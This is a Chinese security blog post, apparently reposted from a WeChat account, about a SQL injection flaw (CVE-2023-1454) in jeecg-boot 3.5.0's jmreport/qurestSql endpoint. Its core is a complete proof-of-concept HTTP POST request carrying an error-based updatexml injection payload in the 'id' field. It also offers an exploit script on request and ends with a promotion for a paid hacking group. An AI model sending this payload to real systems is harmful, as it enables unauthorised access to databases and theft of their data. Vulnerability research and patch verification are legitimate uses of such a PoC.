【文末脚本】Jeecg-Boot SQL注入漏洞

新闻资讯   2023-06-13 07:59   106   0  

免责声明
   由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负
责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除
并致歉。谢谢!

              文末有脚本

0x01 介绍

在 jeecg-boot 3.5.0 中发现了一个被归类为严重的漏洞。这会影响文件 jmreport/qurestSql 的未知部分。参数 apiSelectId 的操作导致 sql 注入。可以远程发起攻击。

0x02 poc

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
Content-Length: 130
Content-Type: application/json;charset=UTF-8

{"apiSelectId":"1290104038414721025",
"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}


0x03 参考链接

https://vuldb.com/?id.223299
https://github.com/J0hnWalker/jeecg-boot-sqli
https://vuldb.com/?ctiid.223299
https://cxsecurity.com/cveshow/CVE-2023-1454/

0x04 脚本

后台回复 "CVE-2023-1454"

链接失效可加我wx私发给你,技术交流可加


WK安全 知识星球 一次付费,永久免费(付费之后会拉入内部成员群,直接免费续上)。有需要的直接添加下面微信 99永久,私我支付,直接拉内部成员群,扫码支付,三天后拉内部成员群。

内部群共享

1.fofa高级会员账号

2.某学院高级靶场账号(附带wp)

3.专属内部漏洞库(持续更新)

4.原创漏洞挖掘报告

5.工作、护网内推


星球介绍:

星球针对安全新人有优秀学习资源,星球专属嘉宾进行问题解答,

性价比很高。

如果你是入门不久,想要提升漏洞挖掘能力,那该星球是个不错的选择,星球内拥有

专属漏洞报告,

各种奇淫技巧、挖洞技术、专属嘉宾在线问答等。

欢迎您的加入,星球部分内容请你查看!!



星球专栏预览




扫码查看更多内容





文章引用微信公众号"WK安全",如有侵权,请联系管理员删除!

博客评论
还没有人评论,赶紧抢个沙发~
发表评论
说明:请文明发言,共建和谐网络,您的个人信息不会被公开显示。